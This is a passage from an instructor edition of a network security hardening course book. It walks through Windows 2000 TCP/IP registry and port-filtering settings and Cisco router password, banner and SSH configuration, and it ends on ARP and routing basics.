part of an AIS fromfunctioning in accordancewith its intended purpose.

smurfing:A denial of service attack in

which an attacker spoofs thesource address of an echo-request ICMP (ping) packetto the broadcast address for

a network, causing themachines in the network to

respond en masse to thevictim.

314 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 368: SCNP Hardening

A setting of 1 will allow TCP to perform dead-gateway detection and change to abackup gateway. A setting of 0 will disallow this function. From a security per-spective, a setting of 0 is recommended.

MTU RestrictionsAttackers can use the Maximum Transmission Unit to force a network to usevery small segments. By using Path MTU Discovery, TCP tries to identify thelargest packet size that a path to a remote host will accommodate. Conversely,when used incorrectly, the network can be flooded with tiny segments. The spe-cifics for adjusting this value are defined as follows:

• Value Name: EnablePMTUDiscovery

• Key: Tcpip\Parameters

• Valid Range: 0 (False), 1 (True)

• Default Value: 1 (True)

A setting of 1 will allow TCP to discover the largest segment size to a remotehost. A setting of 0 will fix the MTU size to 576 bytes for all communicationwith a host not on the local subnet. Communication to local hosts will still usethe largest segment size—only remote host communication is affected. From asecurity perspective, a setting of 0 is recommended.

Keep AliveDefault TCP behavior in Windows does not verify idle connections. It is recom-mended that these connections be verified (using third-party software, if need be)for availability by sending a keep-alive packet and waiting for the response. Ifthere is no response, then the idle connection can be closed. The specifics foradjusting this value are defined as follows:

• Value Name: KeepAliveTime

• Key: Tcpip\Parameters

• Value Type: REG_DWORD (The value is in milliseconds)

• Valid Range: 1-0xFFFFFFFF

• Default Value: 7,200,000 (two hours)

The recommended setting for this value is 300,000, which is five minutes.

TASK 4G-12Configuring TCP/IP in the Registry

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

Note:This task should be performed by all students.

1. Open a Registry Editor.

2. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

3. Open the Tcpip\Parameters key.

Lesson 4: Hardening Windows Computers 315

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 369: SCNP Hardening

4. In the right pane, right-click and add the following REG_DWORD val-ues:

a. SynAttackProtect

b. EnableDeadGWDetect

c. EnablePMTUDiscovery

d. KeepAliveTime

5. Double-click SynAttackProtect, and enter a value of 2.

6. Double-click EnableDeadGWDetect, and enter a value of 0.

7. Double-click EnablePMTUDiscovery, and enter a value of 0.

8. Double-click KeepAliveTime, and enter a decimal value of 300,000. InHex notation, this is 493E0.

9. Close the Registry Editor.

TCP/IP FilteringAnother built-in Windows 2000 feature that you can add to your layered defenseis TCP/IP filtering. TCP/IP filtering is a method of controlling inbound networkaccess to a host. TCP/IP filtering is independent of other processes, such asIPSec, and other services, such as the Server and Workstation services. To controloutbound access, you need to implement Routing And Remote Access filters.

When you are configuring filtering, you have the option to control access to TCPports, to UDP ports, and to specific IP protocols. Each access point is controlledby the numerical value. In other words, you control port access by the port num-ber, such as 80 for WWW access. To control an entire protocol, use the IPprotocol number. The following table lists, for quick reference, several commonIP protocol numbers to use in filtering.

Protocol Number Protocol Acronym Full Name of Protocol1 IP Internet Protocol6 TCP Transmission Control Protocol17 UDP User Datagram Protocol

When you enable TCP/IP filtering on one interface, it is enabled on all interfaces;however, you must configure the specific filters on a per-interface basis. Whenyou are configuring the port filters, the options are to enable all ports or to definethe ports that are to be allowed. Remember that this is configuring inboundports—not outbound. The system will not filter responses to requests initiated bythe host, so you will not need to open high ports for network responses.

Finally, if you want to filter protocols, be aware that you cannot block ICMPmessages. This is the case, even if you exclude IP Protocol 1 from the allowedprotocol list. A simple way to block TCP traffic, for example, is to select theoption to filter TCP ports, but not add any ports to the allowed list.

316 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 370: SCNP Hardening

TASK 4G-13Configuring Port and Protocol Filtering

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Navigate to the Properties for the Classroom Hub interface.

2. Scroll to and select Internet Protocol (TCP/IP), and then clickProperties.

3. Click the Advanced button.

4. Display the Options tab.

5. Select TCP/IP Filtering, and click Properties.

6. Check Enable TCP/IP Filtering.

7. Permit only the following TCP ports: 20, 21, 23, 25, 80, 110, and 443.

8. Permit only the following protocols: 6 and 17.

9. Click OK to implement your filtering.

10. Click OK to close the Advanced TCP/IP Properties.

11. Click OK twice to close the TCP/IP and Interface Properties.

12. When you are prompted to restart the server, click No. To fully implementyour changes, you would have to restart the server, however, for the pur-poses of this class, we need to have all ports and protocols available.

13. Go back and revert to the unfiltered settings to allow for the remainder ofthe tasks to function with no restrictions.

14. This time, restart your computer when you are prompted to. Then, logon as the renamed Administrator account and verify that the TCP/IPsettings are correct.

15. Close all open windows.

Lesson 4: Hardening Windows Computers 317

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 371: SCNP Hardening

SummaryIn this lesson, you were introduced to the fundamental issues of securingWindows 2000 computers and resources. You configured GPOs for the secu-rity of the infrastructure, described the process of local logon on Windows2000, and implemented security tools, including secedit.exe and The Secu-rity Configuration And Analysis Snap-in. You then configured loggingoptions, focusing on the Security Log, and implemented local encryption byusing EFS. Finally, you examined methods of securing network communica-tions and how to harden the TCP/IP stack in Windows 2000.

Lesson Review4A What are the new components of Windows networking that are intro-

duced with Windows 2000?

Answers will vary, however some of the components are: Active Directory,trees, forests, Organizational Units, and Group Policy Objects.

Place the following GPOs in the order that they are processed.

2 Site

1 Local

4 OU

3 Domain

4B What are some of the authentication methods Windows 2000 supports?

Kerberos, NTLM, RADIUS, SSL, and Smart Cards.

What is the name of the component of the Windows 2000 architecturethat makes the method of authentication transparent to an applicationdeveloper?

Security Support Provider Interface (SSPI).

In Kerberos, you can implement Single Sign On (SSO) so that a userneeds to enter their logon credentials only once to access all networkservices.

4C What are the three tools introduced in this topic for managing the secu-rity of the Windows 2000 network?

The secedit.exe tool, security templates, and the Security Configuration AndAnalysis Snap-in.

What are the four basic levels for security templates?

Basic, compatible, secure, and highly secure.

318 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 372: SCNP Hardening

If you want to secure an IIS 5.0 server, which template should youimplement?

The hisecweb.inf template.

4D What are the three file systems discussed in this topic that are supportedby Windows 2000?

FAT, FAT32, and NTFS.

How can you prevent subfolders from inheriting permissions from theirparent folders?

Have the parent security permissions applied To This Folder Only.

What are the three levels of permission that can be granted to secureprinters?

Print, Manage Printers, and Manage Documents.

4E What command would you use to have an audit policy take effect imme-diately on the local machine?

The secedit /refreshpolicy machine_policy command.

What is the Event ID of a successful network logon event?

540.

What is the Logon Type of an Interactive Logon?

Logon Type 2.

4F In EFS, what is used to perform the encryption?

The File Encryption Key (FEK).

What is the encryption algorithm used by EFS?

DES.

Do users require an Administrator to enable EFS on their systems?

No, EFS is enabled by default, and a user can implement it without theAdministrator being involved, unless there is a policy implemented that pre-vents it from being used.

4G Which hive will you use if you want to make changes to the TCP/IPstack operation in a Windows 2000 computer?

HKEY_LOCAL_MACHINE.

How can you configure TCP/IP filtering on a Windows 2000 Server tofilter outbound access?

You cannot. TCP/IP filtering in Windows 2000 is designed to filter inboundaccess only.

Lesson 4: Hardening Windows Computers 319

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 373: SCNP Hardening

320 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 374: SCNP Hardening

Routers and Access ControlLists

OverviewIn this lesson, you will be introduced to the functioning of routers and rout-ing protocols. The examples in this lesson are shown on Cisco Routers,specifically the 2500 series. You will examine the issues of securing routersand routing protocols. You will remove unneeded services and crate accesscontrol lists to manage and secure the network. The lesson ends with thecreation of logging options on the Cisco router.

ObjectivesIn this lesson, you will:

5A Configure fundamental router security.

You will create the required configurations to secure connections, createbanners, and implement SSH.

5B Examine principles of routing.

You will capture routing protocols and analyze the IP and MAC relation-ship in a routed environment.

5C Configure the removal of services and protocols.

You will create the required configurations to harden the core servicesand protocols on a Cisco router.

5D Examine the function of Access Control Lists on a Cisco router.

You will create wildcard masks to be used in conjunction with the imple-mentation of Access Control Lists.

5E Implement Cisco Access Control Lists.

You will create the required configurations to implement Access ControlLists to defend against network attacks on a Cisco router.

5F Configure logging on a Cisco router.

You will create the required configurations to enable logging on a Ciscorouter.

Data Filesping-arp-mac.caprip update.capripv2withAuthentication.cap

Lesson Time6 hours

LESSON

5

Lesson 5: Routers and Access Control Lists 321

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 375: SCNP Hardening

Topic 5AFundamental Cisco SecurityAlthough this lesson is not designed to make you a Cisco or a routing expert, youwill become familiar with the core functions of routers and how to best hardenthis critical component of the infrastructure.

Cisco Router LanguageA Cisco router has one or more connections to networks. Each of these connec-tions is referred to as an interface. To further define this interface concept, Ciscouses the type of interface as part of the name as well. Therefore:

• An interface that is connected to an Ethernet segment of the network alwaysstarts with an E.

• A Fast Ethernet interface always starts with an F.

• An interface that is connected to a serial connection always starts with an S.

• An interface that is connected to a Token Ring segment always starts withTo.

Along with the interface type, Cisco routers are numbered. The interface number-ing begins with a zero. In other words:

• The first Ethernet interface on the router is known as E0.

• Likewise, the first serial interface on the router is S0.

• Finally, the first Token Ring interface on the router is To0.

Cisco Operating SystemThe Cisco routers do have their own operating system, which is known as theIOS (Internetworking Operating System). The IOS is found on all Cisco routersand can be uploaded to or downloaded from a tftp site. It is common to copy theIOS image to the tftp location as a quick backup in the event that the runningIOS gets corrupted.

Most of the current routers in production are running versions 11.x or 12.x of theCisco IOS. When Cisco makes a major release of the IOS, it is assigned a num-ber, such as 11 or 12. Major releases can also be added to the numbers, such as11.2 or 12.2. You might also see an IOS listed as version 12.0(3). The 3 in paren-thesis is the third maintenance revision of the major release. Maintenancerevisions are released every eight weeks and contain bug fixes and/or updates, asCisco dictates.

Cisco Router Terminology

bug:An unwanted and unintended

property of a program orpiece of hardware, especially

one that causes it tomalfunction.

322 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 376: SCNP Hardening

Accessing the RouterCisco provides a wide variety of access points for their routers. Each method ofaccess can provide the ability to view the router differently. Some methodsrequire the network to be functioning and active, while others do not require anynetwork connectivity at all. The methods of access include the console port, theauxiliary port, or network access. Network access can, in turn, include VTY (ter-minal access), HTTP, TFTP, and SNMP. Each of these methods is detailed here:

• The console port is the main point of access on a Cisco router. This is adirect physical connection, requiring the router to be in the presence of theperson using the port. This is the connection method used to create the ini-tial configuration and in the event of an emergency, such as passwordrecovery. Because it has direct physical access, the console port should notbe the primary method of accessing the router.

• The auxiliary port can be used to connect to the router via a modem. Thiscan be a functional method of accessing the router if the primary network isdown and you are not able to gain physical access to the router.

• The VTY sessions provide for terminal access to the router. These connec-tions require the network to be functioning to provide access. The mostcommon method of accessing a VTY session is telnet, although—for securitypurposes—SSH is supported, and is recommended. There are five VTY portson the router by default, and they are numbered 0 though 4. In this course,access will be provided by using VTY sessions.

• Other network access points like HTTP, TFTP, and SNMP are also supportedon newer versions of the IOS. HTTP can be used if the router runs as a Webserver, authenticating users for access. TFTP is used for loading IOS andconfiguration files, and SNMP can be used in full network managementconfigurations.

Modes of OperationIn the router, there are several different modes an administrator can use. Theserange from simple, informational modes, to the complex modes of routerconfiguration. There are several examples of the different modes listed below:

• User Mode—In this mode, users can see the configuration of the router, butwill not be able to make any significant changes to the router. The promptfor User Mode looks like this: Router>.

• Enable Mode—In this mode, users can make more significant changes to therouter, including some of the router configuration options. The prompt forEnable Mode looks like this: Router#.

• Global Configuration Mode (also known as Configure Terminal Mode)—Inthis mode, users can make configuration changes that will affect the entirerouter. The prompt for Global Mode looks like this: Router(config)#.

Generally, once you connect to the router, you will move to Enable Mode rightaway, since that is where much of the router management happens. As a sidenote, Enable Mode is often called Privileged Mode in text. So, you can considerEnable Mode and Privileged Mode to mean the same thing—the next level ofrouter access beyond User Mode.

Ways to Access the Router

SNMP:(Simple NetworkManagement Protocol)Software used to controlnetwork communicationsdevices using TCP/IP.

Operating Modes

Lesson 5: Routers and Access Control Lists 323

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 377: SCNP Hardening

Configuration FragmentsIn this lesson, you will see many examples of configurations of the router. It isnot practical to list every step and every line entered for every option. Therefore,what you will see are called configuration fragments.

For example, to navigate to an Interface Mode of a router, the following com-mands are required:

1. Connect to the router via an access method, such as telnet: Telnet 10.10.10.10

2. Enter the password for VTY access: L3tm3!n

3. Enter the password for Enable Mode: P0w3r

4. Enter the command for Configure Terminal Mode: Configure Terminal

5. Enter the command for Interface Mode: Interface Ethernet 0

In this course, the command sequence listed previously will not be described line-by-line but with a configuration fragment. So, the steps to access Interface Modewill look like this:

1. Router#Config Terminal

2. Router(Config)#Interface Ethernet0

This configuration fragment goes right to the concept, or function, of thediscussion. In this example, you cannot be in Enable Mode (identified by theRouter# prompt), without first accessing the router (probably by using Telnet),and entering the required credentials.

Navigating in the RouterThe Cisco router interface is a command-line interface, with a format that is simi-lar to UNIX. For those of you getting started with the router, if you get lost inthe command structure, here are some of the more common commands to learnand use.

• First is the question mark (?).

— This simple single character command will list for you all the availableoptions at a given point in the router. For example, if you enter thequestion mark at the User Mode prompt, like so: Router>?, you willbe given an alphabetical list of the commands that are options at thispoint. This command will yield a different set of commands than usingthe same question mark at the Enable Mode prompt (Router#?).

— If you recall the first letter of a command, but not the entire string,again the question mark can come in handy. For example, if you aretrying to enter Enable Mode, but forgot how to spell enable, you canuse the following command: Router>E? This command lists all thecommands starting with the letter E with brief descriptions of theirfunctions.

• Other shortcuts to use are the Up Arrow and Down Arrow keys. Using thesewill scroll you through commands you have entered into the router for quickaccess.

• Finally, using key combinations can be helpful as well. Two examples of keycombinations are Ctrl+A and Ctrl+E.

— Using the Ctrl+A key combination moves the cursor to the beginning ofa command line.

Navigation

324 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 378: SCNP Hardening

— Using the Ctrl+E key combination moves the cursor to the end of acommand line.

As an FYI, if the Up Arrow and Down Arrow keys do not function on yoursystem, you can use the key combination Ctrl+P in place of the Up Arrowkey, and Ctrl+N in place of the Down Arrow key.

Authentication and AuthorizationIn order for someone to have access to control a router, there must be bothauthentication and authorization. It is important to not get these two confused, asthey are so similar. Authentication is the process of identifying a user, generallygranting or denying access. Authorization is the process of defining what a usercan do or is authorized to do. So, a user gains access to the router via authentica-tion and gains control of the router via authorization.

In Cisco routers, there are two main categories of authentication. They are theAAA method and the non-AAA method (called traditional by some). AAA standsfor Authentication, Authorization, and Accounting.

• Earlier, you were introduced to the methods of access, such as console, aux-iliary, and VTY sessions. These are considered non-AAA access methods.Another non-AAA access method is called Terminal Access ControllerAccess Control System, or TACACS for short. They use a local usernameand password for authentication.

• AAA methods include RADIUS and Kerberos. These methods provide forthe full level of Authentication, Authorization, and Accounting that arerequired for AAA access methods.

Configuring Access PasswordsBecause there are several different methods of accessing the router, in order toprovide security, you must be able to lock down these access points. The first lineof defense is to provide a password for these forms of access.

Setting the Console PasswordBecause the console-port connection is used for direct access, it must have astrong password. This can be, and usually is, created during the initial setup ofthe router. In order to set the Console password, you will need to enter ConfigureTerminal Mode, and then enter the command line console 0. This is whatgets you into the mode where the password can be created. The login commandtells the router that a password is required, and the password command is used toenter the actual password. The configuration fragment looks like this:

Router#config terminalRouter(config)#line console 0Router(config-line)#loginRouter(config-line)#password l3tm3!nRouter(config-line)#^ZRouter#

Configuring AccessPasswords

Lesson 5: Routers and Access Control Lists 325

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 379: SCNP Hardening

Setting the Enable PasswordsThe process for setting the Enable password is similar to the process for settingthe Console password. And, you will notice the process for the following sectionsare all similar, only the object (such as the console or vty) is the difference.

As to the password itself, there are two different Enable passwords. The first isthe standard Enable password; the second is the Enable Secret password. Thestandard Enable password is used only for backwards compatibility. If the EnableSecret password has been configured, it will take precedence. The reason that theEnable Secret password is used over the standard Enable password is that theEnable Secret password is encrypted and cannot be read in plaintext in the router.The configuration fragment for setting the Enable Secret password looks like this:

Router#config terminalRouter(config)#enable secret p@55w0rdRouter(config)#loginRouter(config)#^ZRouter#

Setting the VTY PasswordConfiguration of the password for the VTY sessions is similar to creating theConsole password. Remember that there are five VTY sessions, numbered 0through 4. When you are setting the VTY password, you can create a passwordfor one or for all of these sessions. In this first configuration fragment, the pass-word is set for just the first VTY session:

Router#config terminalRouter(config)#line vty 0Router(config-line)#loginRouter(config-line)#password l3tm3!nRouter(config-line)#^ZRouter

In the following configuration fragment, the password is set for all VTY sessions,0 through 4. Note that the process is nearly identical.

Router#config terminalRouter(config)#line vty 0 4Router(config-line)#loginRouter(config-line)#password l3tm3!nRouter(config-line)#^ZRouter

326 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 380: SCNP Hardening

TASK 5A-1Configuring Passwords

1. Create the configuration fragment that you would use to set the Consolepassword of ACC3$$, and to set all VTY sessions to use the password of+3ln3+.

Router#configure terminalRouter(config)#line console 0Router(config-line)#loginRouter(config-line)#password ACC3$$Router(config-line)#^ZRouter#Router#configure terminalRouter(config)#line vty 0 4Router(config-line)#loginRouter(config-line)#password +3ln3+Router(config-line)#^ZRouter#

Creating User AccountsAlthough for regular operation of the router, individual user accounts are notrequired, when you do add them, it allows for another level of control over therouter and over router access.

To create local user accounts, the command syntax is only one line. In organiza-tions where there are multiple people managing the router, this is a solid practice.The following configuration fragment shows the creation of several user accounts:

Router#configure terminalRouter(conf)#username Auser password u$3r1Router(conf)#username Buser password u$3r2Router(conf)#username Cuser password u$3r3Router(conf)#username Duser password u$3r4Router(conf)#^ZRouter#

Implementing BannersIn addition to having proper passwords on the router, it is important to haveadequate warning banners. It is highly recommended that you view these bannersas warning banners and not as welcome banners, as they used to be called. Awarning banner is not designed to be the end-all of security; most people know abanner will not stop a determined attacker. However, a banner can provide somelegal backing for you and your organization.

Configuring Banners

Lesson 5: Routers and Access Control Lists 327

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 381: SCNP Hardening

There are four general functions that warning banners should provide. Althoughyou should look to professional legal counsel for the exact wording, your bannershould address each of these. The banner should:

• Not provide useful technical or non-technical information that an attackercan use.

• Inform users of the system(s) that their actions are subject to recording, andmay be used in a court of law.

• Define who is and who is not an authorized user of the system(s).

• Provide adequate legal standing to both prosecute offenders and protect theadministrators of the equipment.

The following is an example of what a banner could look like for an organiza-tion:

Warning!!! This system is designed solely for the authorizedusers of Company X on official business. Users of this systemunderstand that there is no expectation of privacy, and that useof the system may be monitored and recorded. Use of this systemis consent to said monitoring and recording. Users of thissystem acknowledge that if monitoring finds evidence of misuse,abuse, and/or criminal activity, that system operators mayprovide monitoring and recording data to law enforcementofficials.

Implementing Cisco BannersOn the Cisco router, there are several types of banners available:

• MOTD banner—The MOTD banner is for setting Messages Of The Day.This is not an efficient location for the default warning banner. The reasonthis is not an efficient location is that the MOTD banner is something thatliterally can change with each day. You do not want to be setting the warn-ing banner each and every day, and worrying about missing a day. Thisbanner is used for sending notices to users, such as if there is an upcomingsystem shutdown for upgrading the IOS.

• Login banner—The login banner is where the warning banner should belocated. This banner will be shown to each user every time a login attempthappens. The banner is set in Configure Terminal Mode, and uses a begin-ning and ending delimiter character. The delimiter can cause confusion, butis quite simple. Any character can be used as a delimiter, you just mustmake sure to use the same character at the beginning and the end. In thefollowing configuration fragment, the letter C is used as the delimiter charac-ter:

328 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 382: SCNP Hardening

Router#configure terminalRouter(config)#banner login CWarning!!! This system is designed solely for the authorizedusers of Company X on official business. Users of this systemunderstand that there is no expectation of privacy, and thatuse of the system may be monitored and recorded. Use of thissystem is consent to said monitoring and recording. Users ofthis system acknowledge that if monitoring finds evidence ofmisuse, abuse, and/or criminal activity, that systemoperators may provide monitoring and recording data to lawenforcement officials.CRouter(config)#^ZRouter#

• EXEC banner—The EXEC banner is used for setting a message for userswho enter EXEC, or Privileged, Mode. You can create a new banner; use thesame warning banner, or whatever else you wish. The process for setting anew banner is nearly identical to the process for the login banner. The differ-ence is in the command. Instead of the command banner login, you usethe command banner exec. In the following configuration fragment, youcan see the exec banner created, with a delimiter of the pound sign (#):

Router#configure terminalRouter(config)#banner exec #Reminder!!! When you logged into this system, youacknowledged that you are an authorized user of Company Xsystems. You also acknowledged that your use of this systemmay be monitored and recorded. Finally, you agreed that ifmisuse, abuse, and/or criminal activity are found whilemonitoring, that law enforcement officials may be contacted.#Router(config)#^ZRouter#

TASK 5A-2Configuring Login Banners

1. Create the configuration fragment that you would use to create a loginwarning banner. You can include whatever text you like for the banner,but use the letter B as your delimiter.

A possible response is:

Router#configure terminalRouter(config)#banner login BWarning!!! This is the login banner for the SCNP HTI class.If you are not a member of this class, you may not accessthis system. Users of this system are advised that nearlyeveryone is running packet-capturing utilities and everyoneis watching you!BRouter(config)#^ZRouter#

Lesson 5: Routers and Access Control Lists 329

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 383: SCNP Hardening

SSH OverviewAlthough Telnet is used in this course—and is often the method of choice formany administrators—from a security perspective, it is not a solid option. This isdue to the fact that there is no encryption on the session; all commands andresponses are cleartext and can be viewed by any packet-capture utility.

SSH, or Secure Shell, provides for a higher level of security on remote connec-tions to the router. Using RSA public key cryptography, SSH establishes a securechannel of communication between client and server.

Cisco IOS support for SSH is not present in older versions of the IOS, such as11.2 and 11.3. After version 12.0(5) with IPSec, support for SSH was included.And, only IOS versions that have IPSec will have SSH support.

In order for SSH sessions to be established, there is some preparation that musttake place on the router. The router must have usernames defined, must have ahostname defined, and must have a domainname set.

Router Configuration to use SSHIn implementing SSH, you should use Access Control Lists, controlling VTYaccess. A later section fully details an Access Control List (ACL). However, inbrief, the ACL is used to regulate access (denial or permission) to an object onthe router.

In this configuration fragment, ACL 23 is used to define the host that is allowedto access the router for administration. The host name of the router is simplyRouter and the domain will be scp.mil. The username is SSHUser and the pass-word for this user is No+3ln3+.

Router#configure terminalRouter(config)#ip domain-name scp.milRouter(config)#access-list 23 permit 192.168.51.45Router(config)#line vty 0 4Router(config-line)#access-class 23 inRouter(config-line)#exitRouter(config)#username SSHUser password No+3ln3+Router(config)#line vty 0 4Router(config-line)#login localRouter(config-line)#exitRouter(config)#

The router configuration is close to being finished, but there is still some work tobe done. RSA must be enabled so that the key pair can be generated and used.When creating a new key pair, be aware that it may take some time for the pairto complete. In this fragment, all you will see is the command of creating the keypair crypto generate rsa and the use of 1024 as the number of bits (Cisco recom-mended minimum), and the OK when the calculation is done.

Not all versions of the IOSsupport SSH. Versions thatsupport IPSec also support

SSH.

330 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 384: SCNP Hardening

Router#configure terminalRouter(config)#crypto key generate rsaThe name for the keys will be: Router.scp.milChoose the size of the key modulus in the range of 360 to 2048for your General Purpose Keys. Choosing a key modulus greaterthan 512 may take a few minutes.How many bits in the modulus [512]: 1024Generating RSA keys ...[OK]Router(config)#

You have now enabled SSH to run on your router. There are some commandsthat you can use to fine-tune the SSH function, and you will need to configureyour client to use SSH.

The following configuration fragment is used to define the timeout, in seconds,that the server will wait for the client to provide a password. The default is 120seconds, and the Cisco recommended time is 90 seconds. In this fragment, thetime has been changed to 45 seconds.

Router#configure terminalRouter(config)#ip ssh timeout 45Router(config)#^ZRouter#

The next fragment is used to define the number of retries that will be allowedbefore the router drops the connection. The default for this setting is 3, and themaximum is 5. This is a setting that you may rarely change, but in the fragment,the retries are set to 2, so after the second bad try, the connection is dropped:

Router#configure terminalRouter(config)#ip ssh authentication-retries 2Router(config)#^ZRouter#

Finally is the configuration to let the VTY sessions on the router accept both SSHand Telnet as valid connection types. If you want to have only SSH used, whichis the point here, you would not add the word Telnet to the command.

Router#configure terminalRouter(config)#line vty 0 4Router(config-line)#transport input ssh telnetRouter(config-line)#^ZRouter#

SSH VerificationOn the router, you will want to run some diagnostic commands to find out who isconnected and how. These commands will show you the state of your SSHconnections. There are some differences based on the IOS version you are run-ning, so note that in the following.

If you are running IOS version 12.1, and you want to see the state of SSH con-nections, including who is connected, use the command show ip ssh. Thefollowing fragment lists what this command will reveal.

Router#show ip sshConnection Version Encryption State Username

0 1.5 3DES 4 SSHUserRouter#

Lesson 5: Routers and Access Control Lists 331

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 385: SCNP Hardening

If you are running IOS version 12.2, there are two commands for viewing SSHinformation. First is the show ip ssh command, only here it lists the details,such as timeout and version. The second command is show ssh, and this showsthe user connected. The following fragment shows both commands used, oneafter the other, and their result onscreen.

Router#show ip sshSSH Enabled - version 1.5Authentication timeout: 45 secs; Authentication retries: 2Router#show sshConnection Version Encryption State Username

0 1.5 3DES Session Started SSHUserRouter#

INSTRUCTOR TASK 5A-3Configuring SSH on a Router

Setup: Observe as your instructor performs the SSH configuration onthe LEFT and RIGHT routers.

1. Console in to the LEFT router, and switch to EXEC mode.

2. At the LEFT# prompt, enter conf t to switch to config mode. TheLEFT(config)# prompt should be displayed.

3. Enter ip domain-name left.com to provide a domain name.

4. Enter crypto key generate rsa to create key pairs. When you are promptedfor the number of bits in the modulus, press Enter to accept the default of512.

5. Enter ip ssh time-out 120 to set the timeout value to 2 minutes.

6. Enter is ssh authentication-retries 3 to limit the number of unsuccessfulattempts.

7. Enter line vty 0 4 to begin the line configuration. The LEFT(config-line)#prompt is displayed.

8. Enter transport input ssh to limit the VTY sessions to accept only SSHconnections.

9. Enter login local to provide for local login.

10. Enter exit to return to the LEFT(config)# prompt.

11. Enter username sshl01 privilege 15 password sshpass to assign a user nameand password for student station L01.

Repeat this command to assign user names and passwords for all otherstudent stations on the left side of the classroom.

12. Enter exit to return to the LEFT# prompt.

332 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 386: SCNP Hardening

13. Enter copy ru st to save the configuration changes. Press Enter to acceptthe default file name.

14. Enter exit to return to the LEFT> prompt.

15. Disconnect from the LEFT router, and console in to the RIGHT router.

16. Use the steps listed previously as a guide to set up SSH on the RIGHTrouter. Use the domain name right.com, and create user names such assshr01, sshr02, and so forth.

17. Disconnect from the RIGHT router, and close the console.

18. Try to Telnet to either of the ssh-enabled routers, and ask students to dothe same. None of the attempts should be successful, as you have blockedTelnet connections on both routers.

Client Configuration to use SSHJust as there was some configuration required on the server, some configuration isneeded on the client side to run SSH. However, the configuration on the client isnot nearly as complex. In general, a client SSH application must be installed, andthe client must be configured to use the application in communication with therouter. There are several SSH Client programs available, and in this example, thePuTTY program is used. Figure 5-1 shows an example of the settings for thisapplication.

Figure 5-1: The client configuration for an SSH session.

During the configuration, you will be asked to provide input on the cryptographyused, and you will select RSA. Additionally, you will be required to presentproper credentials when connecting, meaning the local username on the routerand the password. Once you enter the proper credentials, you will have secureaccess, and operation will be no different than using Telnet.

Lesson 5: Routers and Access Control Lists 333

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 387: SCNP Hardening

TASK 5A-4Configuring the SSH Client

Setup: You are logged on to Windows 2000 Server as the renamedAdministrator account. The routers have a limited number ofsimultaneous logins, so you might need to take turns accessingthe routers if your class has many students in it.

1. Copy the file putty.exe from the location provided by your instructor toyour boot partition. The PuTTY program is a popular freeware package.

2. Double-click putty.exe.

3. For Host Name, enter the IP address for your router. Your instructor willprovide the router IP addresses. The router you use is named LEFT orRIGHT, based on your location in the classroom.

4. Click SSH (Port 22).

5. Click Open to initiate the connection.

6. When you are prompted, click Yes to accept the key, and click Yes to con-tinue the connection. Press Enter to display the login prompt.

7. Enter your ssh user name, such as sshl01. You should be prompted for apassword.

8. Enter sshpass to complete the login sequence.

9. After authentication has taken place, log out and close PuTTY.

Topic 5BRouting PrinciplesTo be able to secure your routers and routed networks, you need to understandsome basic principles related to routing in general. Let’s begin by looking at howrouters and routing fit into the OSI Model.

The ARP ProcessMost people are aware that routers function at the Network layer, but that state-ment must be understood as routers route at the Network layer. Routers areaffected by and operate at other layers as well, including the Data Link layer.

The OSI model is the foundation of all network communication. Routers fit intothe OSI model just as other devices do, with their primary functionality being atthe Network layer. In this lesson, the vast majority of the content will be focusingon the Network layer; however, there are important areas of the Data Link layerthat must be investigated as well.

Provide students with thelocation of the PuTTYinstallation program.

Provide students with theIP addresses for the LEFT

and RIGHT routers.

334 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 388: SCNP Hardening

MAC addresses are split into two parts, each containing six hexadecimal digits.The first six digits represent the vendor code (manufacturer indicator) or OUI(Organizational Unique identifier), and the second six are left for definition by thevendor and are often used as a serial number. These unique 48-bit numbers aredesigned to be globally unique, meaning that there is only one NIC with a givenMAC address on the entire planet.

ARP (RFC 826) is used to make the connection between the Layer Two andLayer Three addresses. ARP is used in the following examples of data movingfrom one host to another.

The first example shows data moving from node 1 to node 2 on a local networksegment. In order for the data to arrive properly, the following steps must occur:

1. Node 1 (knowing the Network layer address of node 2) sends a local broad-cast on the LAN indicating that Node 1 wishes to learn the Data Linkaddress for Node 2.

2. Since Node 1 sent a broadcast, all nodes on the local segment receive andprocess the request, discarding it when they identify that the broadcast wasnot intended for them.

3. Node 2 identifies the message requesting its MAC address and responds bysending its Data Link address. Node 2 also stores the MAC address of Node1 for future use.

4. Node 1 sends the packet directly to the Data link address of Node 2.

Figure 5-2 shows this process between Node 1 and Node 2 on the same segment.

Figure 5-2: This example shows the process of a local ARP broadcast between two nodes.

